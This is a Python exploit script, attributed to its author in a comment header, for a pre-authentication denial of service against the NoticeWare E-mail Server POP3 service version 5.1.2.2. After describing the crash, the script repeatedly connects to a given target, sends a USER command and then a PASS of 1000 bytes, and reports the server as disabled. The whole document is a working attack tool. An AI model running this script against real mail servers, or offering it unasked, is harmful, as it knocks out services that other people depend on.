#!/usr/bin/python
#################################################################################
# Software: NoticeWare E-mail Sever (POP3) 5.1.2.2 Pre-Auth DoS #
# Discovered and Coded by: Paul Hand aka rAWjAW #
# Blog: http://rawjaw-security.blogspot.com #
# E-mail: phand3754<at>gmail<dot>com #
# #
# Description: NoticeWare E-mail Server has many odd querks about it #
# This DoS leverages the fact that the POP3 server can only handle #
# so many exceptions before you get an access violation at 0x00000008 #
# which is given from an EDX+8 where EDX is 0x00000000. #
# I've tried many things to get code execution and non are prevalent. #
# If you fuzz almost any of the commands for the POP3 server you will get it to #
# crash. Also, if you are authenticated and do "LIST 0.5" (numerous times) you #
# will get the same access violation you do with this DoS. #
# #
#Company Contact Date: 10-3-08 (But still no response) #
#################################################################################
import socket
import sys
from optparse import OptionParser
usage = "%prog -T <Target_IP> -P <Target_Port>"
parser = OptionParser(usage=usage)
parser.add_option("-T", "--target_IP", type="string",
action="store", dest="IP", help="Target IP Address")
parser.add_option("-P", "--target_Port", type="int",
action="store", dest="PORT", help="Target Port Address (usually 110)")
(options, args) = parser.parse_args()
IP=options.IP
PORT=options.PORT
if not (IP and PORT):
parser.print_help()
sys.exit(0)
buffer='\x42'*1000
print "########################################################"
print "# NoticeWare Email DoS #"
print "# Written by: Paul Hand aka rAWjAW #"
print "# #"
print "# NOTE: The program does not seem to always crash at #"
print "# the same point for some reason so if the script #"
print "# hangs because of a \"faulty\" closed connection just #"
print "# just CTRL+C and that means the POP3 server has been #"
print "# successfully DoSed. The program will still \"allow\" #"
print "# connections but they will just hang and cannot be #"
print "# used. #"
print "########################################################"
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((IP,PORT))
s.close()
except socket.error, message:
print "Could not make initial connection. Quitting"
sys.exit(0)
print "Connection to the target successful"
print "Sending buffers..."
x=1
while x < 50:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((IP,PORT))
s.recv(1024)
#You DO NOT need a vaild username
s.send('USER admin\r\n')
s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
s.recv(1024)
s.close()
x=x+1
print "DoS Successful!"